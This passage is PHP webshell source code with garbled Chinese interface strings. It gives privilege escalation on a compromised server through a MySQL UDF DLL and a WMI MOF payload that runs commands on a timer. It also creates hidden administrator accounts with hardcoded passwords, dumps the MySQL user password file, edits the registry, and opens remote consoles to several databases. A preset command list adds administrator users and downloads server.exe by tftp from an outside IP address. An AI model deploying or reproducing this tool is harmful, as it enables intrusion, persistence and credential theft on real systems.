mysql5.1汾mysqlĿ¼װUDFʧNTFS-ADSܴļ\';\r\n\t$info = \'\';\r\n\t$mhost = \'localhost\'; $muser = \'root\'; $mport = \'3306\'; $mpass = \'\'; $mdata = \'mysql\'; $mpath = \'C:/windows/mysqlDll.dll\'; $sqlcmd = \'ver\';\r\n\tif(isset($_POST[\'mhost\']) && isset($_POST[\'muser\']))\r\n\t{\r\n\t\t$mhost = $_POST[\'mhost\']; $muser = $_POST[\'muser\']; $mpass = $_POST[\'mpass\']; $mdata = $_POST[\'mdata\']; $mport = $_POST[\'mport\']; $mpath = File_Str($_POST[\'mpath\']); $sqlcmd = $_POST[\'sqlcmd\'];\r\n\t\t$conn = mysql_connect($mhost.\':\'.$mport,$muser,$mpass);\r\n\t\tif($conn)\r\n\t\t{\r\n\t\t\t@mysql_select_db($mdata);\r\n\t\t\tif((!empty($_POST[\'outdll\'])) && (!empty($_POST[\'mpath\'])))\r\n\t\t\t{\r\n\t\t\t\t$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";\r\n\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t{\r\n\t\t\t\t\t$shellcode = Mysql_shellcode();\r\n\t\t\t\t\t$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";\r\n\t\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$query = \'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \\\'\'.$mpath.\'\\\';\';\r\n\t\t\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t$ap = explode(\'/\', $mpath); $inpath = array_pop($ap);\r\n\t\t\t\t\t\t\t$query = \'Create Function state returns string soname \\\'\'.$inpath.\'\\\';\';\r\n\t\t\t\t\t\t\t$MSG_BOX = @mysql_query($query,$conn) ? \'װDLLɹ\' : \'װDLLʧ\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse $MSG_BOX = \'DLLļʧ\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse $MSG_BOX = \'дʱʧ\';\r\n\t\t\t\t\t@mysql_query(\'DROP TABLE Envl_Temp_Tab;\',$conn);\r\n\t\t\t\t}\r\n\t\t\t\telse $MSG_BOX = \'ʱʧ\';\r\n\t\t\t}\r\n\t\t\tif(!empty($_POST[\'runcmd\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'select state("\'.$sqlcmd.\'");\';\r\n\t\t\t\t$result = @mysql_query($query,$conn);\r\n\t\t\t\tif($result)\r\n\t\t\t\t{\r\n\t\t\t\t\t$k = 0; $info = NULL;\r\n\t\t\t\t\twhile($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}\r\n\t\t\t\t\t$info = $infotmp;\r\n\t\t\t\t\t$MSG_BOX = \'ִгɹ\';\r\n\t\t\t\t}\r\n\t\t\t\telse $MSG_BOX = \'ִʧ\';\r\n\t\t\t}\r\n\t\t}\r\n\t\telse $MSG_BOX = \'MYSQLʧ\';\r\n\t}\r\nprint<<\r\nfunction Fullm(i){\r\n\tStr = new Array(11);\r\n\tStr[0] = "ver";\r\n\tStr[1] = "net user PHPINFO_CC PHPINFO_CC /add";\r\n\tStr[2] = "net localgroup administrators PHPINFO_CC /add";\r\n\tStr[3] = "net start Terminal Services";\r\n\tStr[4] = "tasklist /svc";\r\n\tStr[5] = "netstat -ano";\r\n\tStr[6] = "ipconfig";\r\n\tStr[7] = "net user guest /active:yes";\r\n\tStr[8] = "copy c:\\\\\\\\1.php d:\\\\\\\\2.php";\r\n\tStr[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\\\\\server.exe";\r\n\tStr[10] = "net start telnet";\r\n\tStr[11] = "shutdown -r -t 0";\r\n\tmform.sqlcmd.value = Str[i];\r\n\treturn true;\r\n}\r\n\r\n
\r\n
{$MSG_BOX}
\r\n
\r\nַ \r\n˿ \r\nû \r\n \r\n \r\n
\r\nɼ· \r\n
\r\n
װɹ
\r\n\r\n\r\n\r\n
\r\n
\r\nEND;\r\n\tbreak; \r\n\tcase "mysql_exec":\r\n if(isset($_POST[\'mhost\']) && isset($_POST[\'mport\']) && isset($_POST[\'muser\']) && isset($_POST[\'mpass\']))\r\n {\r\n \tif(@mysql_connect($_POST[\'mhost\'].\':\'.$_POST[\'mport\'],$_POST[\'muser\'],$_POST[\'mpass\']))\r\n\t {\r\n\t \t$cookietime = time() + 24 * 3600;\r\n\t \tsetcookie(\'m_eanverhost\',$_POST[\'mhost\'],$cookietime);\r\n\t \tsetcookie(\'m_eanverport\',$_POST[\'mport\'],$cookietime);\r\n\t \tsetcookie(\'m_eanveruser\',$_POST[\'muser\'],$cookietime);\r\n\t \tsetcookie(\'m_eanverpass\',$_POST[\'mpass\'],$cookietime);\r\n\t \tdie(\'ڵ½,Ժ...\');\r\n\t }\r\n }\r\nprint<<\r\n
ַ
\r\n
˿
\r\n
û
\r\n
\r\n
\r\n\r\nEND;\r\nbreak; \r\n\tcase "winapi":\r\n \r\n //Windowsӿ\r\n//function winshell()\r\n//{\r\n$nop=\'  \';\r\nif($_GET[\'winshell\']==\'wscript\'){\r\n$wcmd=$_POST[\'wcmd\'] ? $_POST[\'wcmd\']:\'net user\';\r\n$wcpth=$_POST[\'wcpth\'] ? $_POST[\'wcpth\']:\'cmd.exe\';\r\nprint<<\r\n
\r\n
\r\n{$nop} -> CMD·
\r\n{$nop} \r\n


\r\nEND;\r\nif($_POST[\'do\']==\'do\'){\r\n$ww=$wcpth." /c ".$wcmd;\r\n$phpwsh=new COM("Wscript.Shell") or die("Shell.Wscriptʧ");\r\n$phpexec=$phpwsh->exec($ww);\r\n$execoutput=$wshexec->stdout();\r\n$result=$execoutput->readall();\r\necho $result;\r\n@$phpwsh->Release();\r\n$phpwsh=NULL;\r\n}\r\n}elseif($_GET[\'winshell\']==\'shelluser\'){\r\n$wuser=$_POST[\'wuser\'] ? $_POST[\'wuser\']:\'silic\';\r\n$wpasw=$_POST[\'wpasw\'] ? $_POST[\'wpasw\']:\'1234@silic#\';\r\nprint<<\r\n
\r\n
\r\nShell.UsersӹԱ

\r\n{$nop}½û
\r\n{$nop}û룺

\r\n\r\n


\r\nEND;\r\nif($_POST[\'do\']=\'do\'){\r\n$shell = new COM("Shell.Users");\r\n$cmd = $shell->create($wuser);\r\n$cmd->changePassword($wpasw,"");\r\n$cmd->setting["AccountType"] = 3;\r\n}\r\n}elseif($_GET[\'winshell\']==\'regedit\'){\r\n\r\n$shell1 = new COM("wscript.shell") or die("require windows host");\r\n$action = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\'; \r\necho \'
\';\r\necho \'
ȡ&д&ɾע

\';\r\necho \'
\';\r\nprint<<
\r\n
\r\nRpath:  \r\n \r\n

\r\nEND;\r\n \r\n$rpath = isset($_POST[\'rpath\']) ? $_POST[\'rpath\'] : \'\'; \r\n$rpath = str_replace("\\\\\\\\", "\\\\", $rpath); \r\nif ($action=="read"){\r\n$out = $shell1->RegRead($rpath);\r\necho \'
\'.var_dump($out).\'
\'; \r\necho \'

\'; \r\n}\r\n\r\nprint<<
\r\n
Wpath: \r\n

\r\nWtype: \r\nWvalue: \r\n \r\n


\r\nEND;\r\n \r\n$wpath = isset($_POST[\'wpath\']) ? $_POST[\'wpath\'] : \'\'; \r\n$wpath = str_replace("\\\\\\\\", "\\\\", $wpath); \r\n$wtype = isset($_POST[\'wtype\']) ? $_POST[\'wtype\'] : \'\';\r\n$wvalue = isset($_POST[\'wvalue\']) ? $_POST[\'wvalue\'] : \'\';\r\nif ($action=="write"){\r\n$shell1->RegWrite($wpath, $wvalue, $wtype); \r\n}\r\n\r\nprint<<
\r\n
\r\nDpath: \r\n \r\n

\r\nEND;\r\n \r\n$dpath = isset($_POST[\'dpath\']) ? $_POST[\'dpath\'] : \'\'; \r\n$dpath = str_replace("\\\\\\\\", "\\\\", $dpath); \r\nif ($action=="del"){\r\n$out = $shell1->RegDelete($dpath); \r\n} \r\n}else{\r\n$tip="ݲԱܿõĿΪ֮һ
WebshellڷΪWindowsϵͳ
PHPȨڷdzεʱԳԱ



";\r\nprint<<
\r\n
 [ WScript ] 

\r\n
ʹPHPWindowsеWscript
\r\nWscriptΪcmd
{$tip} [ Shell.User ] 

\r\n
ʹPHPWindowsеShell.user
\r\nUSERΪWindowsϵͳû
{$tip} [ ע ] 

\r\n
ʹPHPWindowsеShell.Wscript
\r\n
ܿɶȡд룬ɾע\r\nRegRead()ȡϵͳע
{$tip}
\r\nEND;\r\n}\r\n//}\r\nbreak;\r\n \r\ncase "mofshell":\r\n session_start();\r\nif(!empty($_POST[\'submit\'])){\r\nsetcookie("connect");\r\nsetcookie("connect[host]",$_POST[\'host\']);\r\nsetcookie("connect[user]",$_POST[\'user\']);\r\nsetcookie("connect[pass]",$_POST[\'pass\']);\r\nsetcookie("connect[dbname]",$_POST[\'dbname\']);\r\nsetcookie("connect[path]",$_POST[\'path\']);\r\necho "";\r\n}\r\nif(empty($_GET["action"])){ \r\necho "
";\r\necho "ip:";\r\necho "

";\r\necho "ʻ:";\r\necho "

";\r\necho ":";\r\necho "

";\r\necho ":";\r\necho "

";\r\necho "дĿ¼(\'\'savefile\'\'ļ):";\r\necho "

";\r\necho "

";\r\necho "
";\r\necho "
ps:mofȨwindows
1:mofȨwscript.shell齨ִshell.usersû
2:ʱãӰִЧ
3:֧wscript.shellshell.user˫Ȩ
4:ִϺȴЩʱٲ鿴
5:2ַʽͬһʱִУĵȴִ

ͣʻ취:
";\r\necho "\r\nһ net stop winmgmt ֹͣ
\r\nڶ ɾļУC:\\WINDOWS\\system32\\wbem\\Repository\\
\r\n net start winmgmt
\r\nģϲִˡ
\r\nC:\\WINDOWS\\system32\\wbem\\Repository\\ ŵǴ⡡ִе.mofᱻ뵽ˡ
\r\nȻһֱűõʱִС
\r\nɾؽĬϴ⡡ǰִmofûˡ
";\r\nexit;\r\n}\r\nif ($_GET[action]==\'connect\')\r\n{\r\n$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die(\'
\'.mysql_error().\'
\');\r\necho "
";\r\necho "
Cmd:";\r\necho "
";\r\necho "
";\r\necho "

";\r\n\r\necho "
";\r\necho "";\r\necho "
";\r\necho "";\r\n\r\necho "
";\r\n \r\necho "
";\r\necho "";\r\necho "
";\r\necho "
"; \r\nif (isset($_POST[\'cmd\'])){\r\n$strCmd=$_POST[\'cmd\'];\r\n$cmdshell=\'cmd /c \'.$strCmd.\'>\'.$_COOKIE["connect"]["path"];\r\n$mofname="c:/windows/system32/wbem/mof/system.mof";\r\n$payload = "#pragma namespace(\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\root\\\\\\\\\\\\\\\\subscription\\")\r\n \r\ninstance of __EventFilter as \\$EventFilter\r\n{\r\n EventNamespace = \\"Root\\\\\\\\\\\\\\\\Cimv2\\";\r\n Name = \\"filtP2\\";\r\n Query = \\"Select * From __InstanceModificationEvent \\"\r\n \\"Where TargetInstance Isa \\\\\\\\\\"Win32_LocalTime\\\\\\\\\\" \\"\r\n \\"And TargetInstance.Second = 5\\";\r\n QueryLanguage = \\"WQL\\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \\$Consumer\r\n{\r\n Name = \\"consPCSV2\\";\r\n ScriptingEngine = \\"JScript\\";\r\n ScriptText =\r\n \\"var WSH = new ActiveXObject(\\\\\\\\\\"WScript.Shell\\\\\\\\\\")\\\\\\\\nWSH.run(\\\\\\\\\\"$cmdshell\\\\\\\\\\")\\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n Consumer = \\$Consumer;\r\n Filter = \\$EventFilter;\r\n};";\r\nmysql_select_db($_COOKIE["connect"]["dbname"],$conn);\r\n$sql1="select \'$payload\' into dumpfile \'$mofname\';";\r\nif(mysql_query($sql1))\r\n echo "
ִ!
\\"ȡwscriptִн\\"鿴!!
ɹִмΡ
ps:wscriptִҪwscript.shell齨ڡ
"; else die(mysql_error());\r\n mysql_close($conn);\r\n}\r\n \r\nif(isset($_POST[\'flag\']))\r\n{\r\n $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die(\'
\'.mysql_error().\'
\');\r\n $sql2="select load_file(\\"".$_COOKIE["connect"]["path"]."\\");";\r\n $result2=mysql_query($sql2);\r\n $num=mysql_num_rows($result2);\r\n while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {\r\n echo "
";\r\n echo \'
\'. $row[0].\'
\';\r\n }\r\n mysql_close($conn);\r\n}\r\n\r\n\r\n\r\nif (isset($_POST[\'shelluser\'])){\r\n\r\n$mofname="c:/windows/system32/wbem/mof/system.mof";\r\n\r\n$payload = "#pragma namespace(\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\root\\\\\\\\\\\\\\\\subscription\\")\r\n \r\ninstance of __EventFilter as \\$EventFilter\r\n{\r\n EventNamespace = \\"Root\\\\\\\\\\\\\\\\Cimv2\\";\r\n Name = \\"filtP2\\";\r\n Query = \\"Select * From __InstanceModificationEvent \\"\r\n \\"Where TargetInstance Isa \\\\\\\\\\"Win32_LocalTime\\\\\\\\\\" \\"\r\n \\"And TargetInstance.Second = 5\\";\r\n QueryLanguage = \\"WQL\\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \\$Consumer\r\n{\r\n Name = \\"consPCSV2\\";\r\n ScriptingEngine = \\"JScript\\";\r\n ScriptText = \r\n\\"var WSH = new ActiveXObject(\\\\\\\\\\"Shell.Users\\\\\\\\\\")\\\\\\\\nz=WSH.create(\\\\\\\\\\"MofNewUser\\\\\\\\\\")\\\\\\\\nz.changePassword(\\\\\\\\\\"ASDfg123!@#...\\\\\\\\\\", \\\\\\\\\\"\\\\\\\\\\")\\\\\\\\nz.setting(\\\\\\\\\\"AccountType\\\\\\\\\\")=3\\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n Consumer = \\$Consumer;\r\n Filter = \\$EventFilter;\r\n};";\r\n\r\nmysql_select_db($_COOKIE["connect"]["dbname"],$conn);\r\n$sql1="select \'$payload\' into dumpfile \'$mofname\';";\r\nif(mysql_query($sql1))\r\n echo "
ִ,ʻMofNewUser 룺ASDfg123!@#...
ps:ShellUser޻Թ,5Ӻв鿴
"; else die(mysql_error());\r\n mysql_close($conn);\r\n\r\n}\r\n}\r\nbreak;\r\n\r\ncase "readpass":\r\nif(isset($_POST[\'sub\'])){\r\n$name=$_POST[\'name\'];\r\n$pass=$_POST[\'password\'];\r\n$host=$_POST[\'host\'];\r\n$db=$_POST[\'db\'];\r\n\r\n$link = mysql_connect($host,$name,$pass);\r\nif(!link){\r\ndie("could not connect".mysql_error());\r\n}\r\n\r\nif(!mysql_select_db($db,$link)){\r\n\tdie("db".mysql_error());\r\n}\r\n\r\n$db_path_sql="select @@basedir";\r\nif($n=mysql_query($db_path_sql)){\r\n\t$db_path_rs=mysql_fetch_array($n);\r\n\t $db_path=str_replace("\\\\","/",$db_path_rs[0]);\r\n}\r\n$dropmoon=\'DROP table moon\';\r\n$sql="CREATE TABLE moon (`code` TEXT NOT NULL ) ENGINE = MYISAM CHARACTER SET utf8 COLLATE utf8_general_ci;";\r\n$exp="LOAD DATA LOCAL INFILE \'".$db_path."data/mysql/user.MYD\' INTO TABLE moon fields terminated by \'\' LINES TERMINATED BY \'\\0\';";\r\n$select="SELECT code FROM moon";\r\n$pass="";\r\nmysql_query($dropmoon);\r\nif(mysql_query($sql)){\r\n\tif($row=mysql_query($exp)){\r\n\t\tif($row=mysql_query($select)){\r\n\t\t\twhile($rows=mysql_fetch_array($row))\r\n\t\t\t\t{\r\n\t\t\t\techo $pass.=$rows[\'code\'];\r\n\t\t\t\t}\r\n\t}\r\n\t}\r\n}\r\n}\r\nelse{\r\n\r\n\techo \'
\';\r\n\techo "

MYSQLȨ޶ȡROOT빤

";\r\n\techo \'
ip   
\';\r\n\techo \'
ʻ
\';\r\n\techo \'

\';\r\n\techo \'
\';\r\n\techo \'
  
\';\r\n}\r\nbreak;\r\ncase "othersql":\r\n //ݿ\r\n//function otherdb(){\r\n$db = isset($_GET[\'db\']) ? $_GET[\'db\'] : \'ms\';\r\nprint<<\r\n
\r\n   MSSQL  \r\n   Oracle  \r\n   InforMix  \r\n   FireBird  \r\n  DB2  
\r\nEND;\r\nif ($db=="ms"){\r\n$mshost = isset($_POST[\'mshost\']) ? $_POST[\'mshost\']:\'localhost\';\r\n$msuser = isset($_POST[\'msuser\']) ? $_POST[\'msuser\'] : \'sa\';\r\n$mspass = isset($_POST[\'mspass\']) ? $_POST[\'mspass\'] : \'\';\r\n$msdbname = isset($_POST[\'msdbname\']) ? $_POST[\'msdbname\'] : \'master\';\r\n$msaction = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$msquery = isset($_POST[\'mssql\']) ? $_POST[\'mssql\'] : \'\';\r\n$msquery = stripslashes($msquery);\r\nprint<<\r\n
\r\n\r\nʻ:\r\n:\r\n:
\r\n\r\n
\r\n\r\n\r\n
\r\nEND;\r\nif ($msaction == \'msquery\'){\r\n$msconn= mssql_connect ($mshost , $msuser, $mspass);\r\nmssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message());\r\n$msresult = mssql_query($msquery) or die(mssql_get_last_message());\r\necho \'\'."\\n\\n";\r\nfor ($i=0; $i\'.mssql_field_name($msresult, $i)."\\n";}\r\necho "\\n";\r\nmssql_data_seek($result, 0);\r\nwhile ($msrow=mssql_fetch_row($msresult))\r\n{\r\necho "\\n";\r\nfor ($i=0; $i\'."$msrow[$i]".\'\';}\r\necho "\\n";\r\n}\r\necho "
";\r\nmssql_free_result($msresult);\r\nmssql_close();\r\n}\r\n}\r\nelseif ($db=="ora"){\r\n$orahost = isset($_POST[\'orahost\']) ? $_POST[\'orahost\'] : \'localhost\';\r\n$oraport = isset($_POST[\'oraport\']) ? $_POST[\'oraport\'] : \'1521\';\r\n$orauser = isset($_POST[\'orauser\']) ? $_POST[\'orauser\'] : \'root\';\r\n$orapass = isset($_POST[\'orapass\']) ? $_POST[\'orapass\'] : \'123456\';\r\n$orasid = isset($_POST[\'orasid\']) ? $_POST[\'orasid\'] : \'ORCL\';\r\n$oraaction = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$oraquery = isset($_POST[\'orasql\']) ? $_POST[\'orasql\'] : \'\';\r\n$oraquery = stripslashes($oraquery);\r\nprint<<\r\n
\r\n:\r\n˿:\r\nʻ:\r\n:\r\nSID:
\r\n\r\n
\r\n\r\n\r\n
\r\nEND;\r\nif($oraaction == \'oraquery\'){\r\n$oralink=OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror());\r\n$oraresult=ociparse($oralink,$oraquery) or die(ocierror());\r\n$orarow=oci_fetch_row($oraresult);\r\necho \'\'."\\n\\n";\r\nfor ($i=0; $i\'.oci_field_name($oraresult, $i)."\\n";}\r\necho "\\n";\r\nociresult($oraresult, 0);\r\nwhile ($orarow=ora_fetch_row($oraresult))\r\n{\r\necho "\\n";\r\nfor ($i=0; $i\'."$orarow[$i]".\'\';}\r\necho "\\n";\r\n}\r\necho "
";\r\noci_free_statement($oraresult);\r\nocilogoff();\r\n}\r\n}\r\nelseif ($db == "ifx"){\r\n$ifxuser = isset($_POST[\'ifxuser\']) ? $_POST[\'ifxuser\'] : \'root\';\r\n$ifxpass = isset($_POST[\'ifxpass\']) ? $_POST[\'ifxpass\'] : \'123456\';\r\n$ifxdbname = isset($_POST[\'ifxdbname\']) ? $_POST[\'ifxdbname\'] : \'ifxdb\';\r\n$ifxaction = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$ifxquery = isset($_POST[\'ifxsql\']) ? $_POST[\'ifxsql\'] : \'\';\r\n$ifxquery = stripslashes($ifxquery);\r\nprint<<\r\n
:\r\nʻ:\r\n:
\r\n\r\n
\r\n\r\n\r\n
\r\nEND;\r\nif($ifxaction == \'ifxquery\'){\r\n$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());\r\n$ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg());\r\n$ifxrow=ifx_fetch_row($ifxresult);\r\necho \'\'."\\n\\n";\r\nfor($i=0; $i\'.ifx_fieldproperties($ifxresult)."\\n";}\r\necho "\\n";\r\nmysql_data_seek($ifxresult, 0);\r\nwhile ($ifxrow=ifx_fetch_row($ifxresult))\r\n{\r\necho "\\n";\r\nfor ($i=0; $i\'."$ifxrow[$i]".\'\';}\r\necho "\\n";\r\n}\r\necho "
";\r\nifx_free_result($ifxresult);\r\nifx_close();\r\n}\r\n}\r\nelseif ($db=="db2"){\r\n$db2host = isset($_POST[\'db2host\']) ? $_POST[\'db2host\'] : \'localhost\';\r\n$db2port = isset($_POST[\'db2port\']) ? $_POST[\'db2port\'] : \'50000\';\r\n$db2user = isset($_POST[\'db2user\']) ? $_POST[\'db2user\'] : \'root\';\r\n$db2pass = isset($_POST[\'db2pass\']) ? $_POST[\'db2pass\'] : \'123456\';\r\n$db2dbname = isset($_POST[\'db2dbname\']) ? $_POST[\'db2dbname\'] : \'mysql\';\r\n$db2action = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$db2query = isset($_POST[\'db2sql\']) ? $_POST[\'db2sql\'] : \'\';\r\n$db2query = stripslashes($db2query);\r\nprint<<\r\n
:\r\n˿:\r\nʻ:\r\n:\r\n:
\r\n\r\n\r\n
\r\n\r\n\r\n
\r\nEND;\r\nif ($myaction == \'db2query\'){\r\n$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());\r\n$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg());\r\n$db2row=db2_fetch_row($db2result);\r\necho \'\'."\\n\\n";\r\nfor ($i=0; $i\'.db2_field_name($db2result)."\\n";}\r\necho "\\n";\r\nwhile ($db2row=db2_fetch_row($db2result))\r\n{\r\necho "\\n";\r\nfor ($i=0; $i\'."$db2row[$i]".\'\';}\r\necho "\\n";\r\n}\r\necho "
";\r\ndb2_free_result($db2result);\r\ndb2_close();\r\n}\r\n}\r\nelseif($db == "fb") {\r\n$fbhost = isset($_POST[\'fbhost\']) ? $_POST[\'fbhost\'] : \'localhost\';\r\n$fbpath = isset($_POST[\'fbpath\']) ? $_POST[\'fbpath\'] : \'\';\r\n$fbpath = str_replace("\\\\\\\\", "\\\\", $fbpath);\r\n$fbuser = isset($_POST[\'fbuser\']) ? $_POST[\'fbuser\'] : \'sysdba\';\r\n$fbpass = isset($_POST[\'fbpass\']) ? $_POST[\'fbpass\'] : \'masterkey\';\r\n$fbaction = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$fbquery = isset($_POST[\'fbsql\']) ? $_POST[\'fbsql\'] : \'\';\r\n$fbquery = stripslashes($fbquery);\r\nprint<<\r\n
:\r\nַ:\r\nʻ:\r\n:
\r\n\r\n
\r\n\r\n\r\n
\r\nEND;\r\nif($fbaction == \'fbquery\'){\r\n$fblink = ibase_connect($fbhost.\':\'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg());\r\n$fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg());\r\necho \'\'."\\n\\n";\r\nfor ($i=0; $i\'.ibase_field_info($fbresult, $i)."\\n";}\r\necho "\\n";\r\nibase_field_info($fbresult, 0);\r\nwhile ($fbrow=ibase_fetch_row($fbresult))\r\n{\r\necho "\\n";\r\nfor ($i=0; $i\'."$fbrow[$i]".\'\';}\r\necho "\\n";\r\n}\r\necho "
";\r\nibase_free_result($fbresult);\r\nibase_close();\r\n}\r\n}\r\n//}\r\nbreak;\r\n\r\n\r\ncase "zippak":\r\n//function zipact()\r\n//{\r\n$zfile=$_POST[\'zfile\'] ? $_POST[\'zfile\']:\'php.zip\';\r\n$jypt=$_POST[\'jypt\'] ? $_POST[\'jypt\']:\'./\';\r\n$tip="δʼѹ";\r\nif($_POST[\'zip\']==\'zip\'){\r\nif(function_exists(zip_open)){\r\n$zfile=key_exists(\'zip\', $_GET) && $_GET[\'zip\']?$_GET[\'zip\']:$zfile;\r\n$zfile= str_replace(array(dirname(__FILE__)."/",dirname(__FILE__)."\\\\"),array("",""),$zfile);\r\n$zpath=str_replace(\'\\\\\',\'/\',dirname(__FILE__)).\'/\'.$zfile;\r\nif(!is_file($zpath)){$tip=\'ļ"\'.$zpath.\'"!\';}else{\r\n$zip= new ZipArchive();\r\n$rs=$zip->open($zpath);\r\nif($rs !== TRUE){$tip=\'ѹʧ:\'.$rs;}\r\n$zip->extractTo($jypt);\r\n$zip->close();\r\n$tip=$zfile.\'ѹɹ!\';}\r\n}else{$tip="֧PHP_ZIP,ȷ";}\r\n}\r\nprint<<\r\n
\r\n\r\nģʹPHPzip_openչZIPѹļ
\r\nʹǰڡϵͳϢȷϵͳ֧php_zip
\r\nѹļ·д¼Ŀ¼·Ŀ¼Ƿɲδ :-(
\r\nȷĿ·д

\r\nѹļ·
\r\n

\r\nĿ·\r\n

\r\n


\r\n{$tip}


\r\nEND;\r\n//}\r\nbreak;\r\n\r\n\r\n\r\n\r\n\r\ncase "mysql_msg":\r\n\t$conn = @mysql_connect($_COOKIE[\'m_eanverhost\'].\':\'.$_COOKIE[\'m_eanverport\'],$_COOKIE[\'m_eanveruser\'],$_COOKIE[\'m_eanverpass\']);\r\n\tif($conn)\r\n\t{\r\nprint<<\r\nfunction Delok(msg,gourl)\r\n{\r\n\tsmsg = "ȷҪɾ[" + unescape(msg) + "]?";\r\n\tif(confirm(smsg)){window.location = gourl;}\r\n}\r\nfunction Createok(ac)\r\n{\r\n\tif(ac == \'a\') document.getElementById(\'nsql\').value = \'CREATE TABLE name (eanver BLOB);\';\r\n\tif(ac == \'b\') document.getElementById(\'nsql\').value = \'CREATE DATABASE name;\';\r\n\tif(ac == \'c\') document.getElementById(\'nsql\').value = \'DROP DATABASE name;\';\r\n\treturn false;\r\n}\r\n\r\nEND;\r\n\t\t$BOOL = false;\r\n\t\t$MSG_BOX = \'û:\'.$_COOKIE[\'m_eanveruser\'].\'      ַ:\'.$_COOKIE[\'m_eanverhost\'].\':\'.$_COOKIE[\'m_eanverport\'].\'      汾:\';\r\n\t\t$k = 0;\r\n\t\t$result = @mysql_query(\'select version();\',$conn);\r\n\t\twhile($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}\r\n\t\techo \'
ݿ:\';\r\n\t\t$result = mysql_query("SHOW DATABASES",$conn);\r\n\t\twhile($db = mysql_fetch_array($result)){echo \'  [\'.$db[\'Database\'].\']\';}\r\n\t\techo \'
\';\r\n\t\tif(isset($_GET[\'db\']))\r\n\t\t{\r\n\t\t\tmysql_select_db($_GET[\'db\'],$conn);\r\n\t\t\tif(!empty($_POST[\'nsql\'])){$BOOL = true; $MSG_BOX = mysql_query($_POST[\'nsql\'],$conn) ? \'ִгɹ\' : \'ִʧ \'.mysql_error();}\r\n\t\t\tif(is_array($_POST[\'insql\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'INSERT INTO \'.$_GET[\'table\'].\' (\';\r\n\t\t\t\tforeach($_POST[\'insql\'] as $var => $key)\r\n\t\t\t\t{\r\n\t\t\t\t\t$querya .= $var.\',\';\r\n\t\t\t\t\t$queryb .= \'\\\'\'.addslashes($key).\'\\\',\';\r\n\t\t\t\t}\r\n\t\t\t\t$query = $query.substr($querya, 0, -1).\') VALUES (\'.substr($queryb, 0, -1).\');\';\r\n\t\t\t\t$MSG_BOX = mysql_query($query,$conn) ? \'ӳɹ\' : \'ʧ \'.mysql_error();\r\n\t\t\t}\r\n\t\t\tif(is_array($_POST[\'upsql\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'UPDATE \'.$_GET[\'table\'].\' SET \';\r\n\t\t\t\tforeach($_POST[\'upsql\'] as $var => $key)\r\n\t\t\t\t{\r\n\t\t\t\t\t$queryb .= $var.\'=\\\'\'.addslashes($key).\'\\\',\';\r\n\t\t\t\t}\r\n\t\t\t\t$query = $query.substr($queryb, 0, -1).\' \'.base64_decode($_POST[\'wherevar\']).\';\';\r\n\t\t\t\t$MSG_BOX = mysql_query($query,$conn) ? \'޸ijɹ\' : \'޸ʧ \'.mysql_error();\r\n\t\t\t}\r\n\t\t\tif(isset($_GET[\'del\']))\r\n\t\t\t{\r\n\t\t\t\t$result = mysql_query(\'SELECT * FROM \'.$_GET[\'table\'].\' LIMIT \'.$_GET[\'del\'].\', 1;\',$conn);\r\n\t\t\t\t$good = mysql_fetch_assoc($result);\r\n\t\t\t\t$query = \'DELETE FROM \'.$_GET[\'table\'].\' WHERE \';\r\n\t\t\t\tforeach($good as $var => $key){$queryc .= $var.\'=\\\'\'.addslashes($key).\'\\\' AND \';}\r\n\t\t\t\t$where = $query.substr($queryc, 0, -4).\';\';\r\n\t\t\t\t$MSG_BOX = mysql_query($where,$conn) ? \'ɾɹ\' : \'ɾʧ \'.mysql_error();\r\n\t\t\t}\r\n\t\t\t$action = \'?eanver=mysql_msg&db=\'.$_GET[\'db\'];\r\n\t\t\tif(isset($_GET[\'drop\'])){$query = \'Drop TABLE IF EXISTS \'.$_GET[\'drop\'].\';\';$MSG_BOX = mysql_query($query,$conn) ? \'ɾɹ\' : \'ɾʧ \'.mysql_error();}\r\n\t\t\tif(isset($_GET[\'table\'])){$action .= 